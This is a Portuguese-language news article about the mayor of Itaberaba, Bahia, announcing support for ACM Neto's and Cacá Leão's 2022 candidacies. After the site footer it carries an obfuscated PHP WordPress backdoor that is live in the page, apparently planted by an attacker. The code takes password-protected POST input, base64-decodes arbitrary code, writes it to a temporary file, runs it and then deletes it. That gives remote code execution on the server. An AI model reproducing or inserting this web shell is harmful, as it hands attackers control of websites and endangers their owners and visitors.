• SEJA BEM-VINDO

Itaberaba: Prefeito Ricardo Mascarenhas anuncia apoio a ACM Neto e Cacá Leão

Publicado em: 11/06/2022 Atualizado:: junho 11, 2022

 

 

O prefeito de Itaberaba, Ricardo Mascarenhas (PP), anunciou apoio às pré-candidaturas de ACM Neto (União Brasil), ao Governo da Bahia, e Cacá Leão (PP), ao Senado, na noite de quinta-feira (09), durante encontro com os aliados. O gestor e o vice-prefeito Davi Anjos afirmaram que seguirão a aliança do Progressistas Bahia com o ex-prefeito de Salvador.

 

“Falamos sobre a política estadual da região da Chapada Diamantina no cenário baiano. Vamos seguir nosso partido, o PP, junto com a liderança estadual, o vice-governador João Leão. Conto com todos vocês nessa caminhada! Sempre serei grato a todos que nos ajudaram até aqui. Vamos em frente”, declarou o prefeito.

 

Durante o encontro, ACM Neto agradeceu a decisão do prefeito Ricardo Mascarenhas. “Fico muito feliz em contar com o apoio do prefeito e do vice de Itaberaba, uma das mais importantes cidades da Bahia. E fico ainda mais feliz porque ele acreditou que a Bahia pode mais e, principalmente, porque nosso grupo tem os melhores projetos para o desenvolvimento da Bahia . Se Deus e o povo me derem a oportunidade de governar a Bahia, em apenas dois anos vou fazer mais por Itaberaba do que o PT fez em 16”, afirmou ACM Neto.

 

Cacá destacou a confiança no trabalho e lealdade do correligionário. “O prefeito Ricardo Mascarenhas é um batalhador e não estará só, jamais. ACM Neto e eu trabalharemos juntos, arduamente, para ajudar o povo de Itaberaba. Estou muito feliz por podermos seguir juntos”, disse.

 

Participaram também do encontro, no município da Chapada, os deputados federal Marcelo Nilo (Republicanos) e estadual Marcelinho Veiga (UB), além da primeira-dama Suzana Matias.

 

Nesta sexta-feira (10), ACM Neto e Cacá Leão encerram mais uma agenda de visitas ao interior da Bahia, em Matina, Riacho de Santana e Igaporã. Desde a última quarta-feira, os dois pré-candidatos passaram por Cairu, Irecê, Iaçu, Ibiquera e Boa Vista do Tupim.

 

………………………………………………

 

Fonte: Bahiaextremosul/Ascom

 


JORNAL INDEPENDENTE


Siga as redes sociais

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}